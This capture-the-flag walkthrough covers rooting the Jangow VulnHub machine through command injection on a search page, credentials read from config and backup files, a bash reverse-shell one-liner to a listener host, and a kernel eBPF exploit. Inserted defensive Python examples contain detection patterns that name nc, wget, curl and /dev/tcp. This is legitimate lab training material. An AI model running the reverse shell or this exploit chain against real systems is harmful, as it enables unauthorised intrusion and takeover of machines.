Jangow:1.0.1 Walkthrough
The aim of this capture the flag (CTF) exercise is to get root access to the target machine. Enumeration is said to be the key to solving it. Some familiarity with basic pen-testing tools and Linux commands is required.
Download link: https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova
Enumeration
We start by identifying the target's IP address with netdiscover.
sudo netdiscover -i eth0
From the output we identify the target IP address as 192.168.56.118. Next, let's run a port scan to find out which ports are open, since this is a necessary part of the enumeration process.
This gives us a better understanding of the attack surface so that we can design targeted attacks.
nmap -sC -sV 192.168.56.118
The output tells us that ports 21 and 80 are open.
Port 21/TCP is running the FTP service, so logging in to the server will be straightforward if we obtain valid credentials.
Port 80/TCP is running the HTTP service, which suggests that a potentially vulnerable website is being hosted.
Visiting the URL takes us to a broken-link page. We discover that directory listing is enabled on the server, and a single folder named site/ is visible in the listing.
Foothold
Clicking the link shows a Grayscale website. There isn't much to see, except for the buscar page, which is linked in the upper right corner.
Interestingly, it appears to be sending a POST request. It also appears that this page has a Local File Inclusion (LFI) vulnerability. What does the word "buscar" mean? It looks like a Spanish word, and translating it gives "to search".
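As an added example (not part of the original walkthrough), here is detection logic a defender could run over access-log lines to flag the kind of input the buscar parameter accepts here: path traversal and sensitive-file references for the LFI case, and shell metacharacters or command words for the command-execution case. The log format, the /site/buscar path and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Heuristics for a free-text search parameter such as "buscar": path traversal and
# sensitive-file references (local file inclusion) plus shell metacharacters or
# command words (OS command injection). Command words alone are noisy, so treat
# them as a reason to review the request, not as proof of attack.
LFI_PATTERNS = [
    (r"\.\./", "path traversal"),
    (r"/etc/passwd|/etc/shadow|\.backup|config\.php|wp-config", "sensitive file reference"),
    (r"php://|file://|data:", "stream wrapper"),
]
CMD_PATTERNS = [
    (r"[;|&`$]", "shell metacharacter"),
    (r"\b(ls|cat|id|whoami|pwd|nc|bash|wget|curl)\b", "shell command word"),
    (r"/dev/tcp/", "bash reverse-shell idiom"),
]

def inspect_param(raw_value):
    """Return the labels of every pattern matched by a URL-encoded buscar value (empty = benign)."""
    decoded = unquote_plus(raw_value)
    return [label for pattern, label in LFI_PATTERNS + CMD_PATTERNS
            if re.search(pattern, decoded, re.IGNORECASE)]

# Constructed sample log. Assumes the application appends the submitted buscar value
# to a combined-format access log line; "/site/buscar" is a placeholder path.
SAMPLE_LOG = """\
192.168.56.1 - - [10/Oct/2023:10:00:01 +0000] "POST /site/buscar HTTP/1.1" 200 buscar=grayscale+theme
192.168.56.1 - - [10/Oct/2023:10:00:09 +0000] "POST /site/buscar HTTP/1.1" 200 buscar=ls+-al
192.168.56.1 - - [10/Oct/2023:10:00:15 +0000] "POST /site/buscar HTTP/1.1" 200 buscar=cat+config.php
192.168.56.1 - - [10/Oct/2023:10:00:21 +0000] "POST /site/buscar HTTP/1.1" 200 buscar=..%2F..%2F..%2Fetc%2Fpasswd
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>GET|POST) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) .*?buscar=(?P<value>\S*)')

def scan_log(lines):
    """Return (client ip, decoded value, findings) for each line whose buscar value looks hostile."""
    flagged = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        findings = inspect_param(m.group("value"))
        if findings:
            flagged.append((m.group("ip"), unquote_plus(m.group("value")), findings))
    return flagged

if __name__ == "__main__":
    for ip, value, findings in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} buscar={value!r}: {', '.join(findings)}")
```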
Let's see what we can do with this LFI vulnerability. Let's enter the ls -al command to list the files and directories.
The output reveals a WordPress directory. Visiting the WordPress page, we find that it is broken.
This could be because WordPress has lost access to the database, or because the database has been erased. Returning to the buscar tab, let's see whether any other files exist that might help us establish an FTP connection.
The listing shows a config.php file, although it appears to be something else. Let's use the cat command to open the file and read its contents.
The output shows a username and password. Let's attempt an FTP connection with them.
The login attempt clearly fails, which suggests that WordPress is having trouble accessing the database. Now let's check the current working path.
Next, let's enumerate every hidden file and directory that might exist in /var/www/html.
The listing shows a .backup file, which appears to contain backup database credentials. Let's use the cat command to read it.
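As an added example (not the walkthrough's own code), here is an audit a defender could run over a web root to catch exactly what was found here: hidden or backup files and configuration files that carry credential-like assignments. The sample web root, its file contents and the placeholder credentials are constructed to mirror the walkthrough's layout and are not the real machine's files.

```python
import os
import re
import tempfile

# Filenames that suggest leftover secrets, and key names that suggest credentials.
SUSPECT_NAMES = re.compile(r"(^\.|\.bak$|backup|\.old$|\.orig$|\.sql$|config\.php$|wp-config)", re.I)
CRED_KEYS = re.compile(
    r"(pass(word|wd)?|user(name)?|db_?(user|pass|host|name))\s*[=:]\s*['\"]?([^'\"\s;]+)", re.I)

def audit_webroot(root):
    """Walk the web root; return sorted (relative path, reasons) for files worth removing or locking down."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if SUSPECT_NAMES.search(name):
                reasons.append("suspicious filename")
            try:
                with open(path, "r", errors="replace") as fh:
                    for line in fh:
                        if CRED_KEYS.search(line):
                            reasons.append("credential-like assignment: " + line.strip())
                            break  # one hit per file is enough to report it
            except OSError:
                continue
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)

def build_sample_webroot():
    """Constructed sample web root (placeholder values, not the real box's files)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "site", "wordpress"))
    with open(os.path.join(root, ".backup"), "w") as fh:
        fh.write("database username: placeholder_user\ndatabase password: placeholder_pass\n")
    with open(os.path.join(root, "site", "config.php"), "w") as fh:
        fh.write('<?php\n$servername = "localhost";\n$username = "placeholder_user";\n'
                 '$password = "placeholder_pass";\n')
    with open(os.path.join(root, "site", "index.html"), "w") as fh:
        fh.write("<html><body>Grayscale</body></html>\n")
    return root

if __name__ == "__main__":
    for rel, reasons in audit_webroot(build_sample_webroot()):
        print(rel, "->", "; ".join(reasons))
```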
Let's try connecting to the server with the FTP client once more. This time we log in successfully.
The user file is located under the jangow01 directory. Use ls to list the files and directories. Let's download the file with FTP's get command.
get user.txt
Now let's read the contents of user.txt.
Next, we need to figure out how to escalate the jangow01 user's privileges to those of root. Obtaining a reverse shell is one way to find out whether this is achievable.
Let's look at each potential approach in turn.
Method 1: Using php-reverse-shell.php
If we upload and execute a PHP reverse shell file on the server, we can establish a reverse shell connection. This can be chained with the LFI vulnerability we have already discovered. The malicious PHP code must be uploaded to the target system so that it returns a reverse shell to us.
The web server will then run the PHP code when we request this file via the LFI. We have two options: write our own PHP code or use one of the many PHP reverse shells that already exist.
- Reverse shell link: https://github.com/pentestmonkey/php-reverse-shell
We will try to upload the file after adjusting the listening host IP and listening port variables to fit our setup. However, the upload is not feasible, because the jangow01 user lacks permission to write to the web directories.
Method 2: Using Netcat
The netcat command is another way to attempt a connection.
nc 192.168.56.118 21
Log in by entering the username and password. However, this does not give us a reverse shell connection either.
Method 3: Using a Bash shell script
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Change the IP address and port in this command to match your own setup. Start a netcat listener on the port you specified before executing the command.
Although the shell we receive is not fully interactive, we have gained a foothold. We can use Python 3 to upgrade it. Finally, by setting the environment variable, we obtain a fully interactive shell.
Switch to user jangow01 using the sudo su command and paste the password.
Privilege Escalation
The next step is to escalate to the root user in order to obtain the highest privilege on the system. Navigate back to the jangow01 directory and list all hidden files and folders.
For privilege escalation we will use a tool called LinPEAS, which automates a significant portion of the enumeration of the target system.
- Download link: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
Next, we need to transfer it to the target system using the FTP service.
We can verify it on the target machine.
Make it executable, then run it.
The output gives us vital information: the target is vulnerable to this exploit. We will try to take advantage of the eBPF_verifier exploit.
The script is available in the ExploitDB database.
Compile the program with the gcc command-line utility. Once it has been executed, create a new file. We can see that the kernel exploit gives us root upon successful execution. You can now locate the root flag to complete the challenge.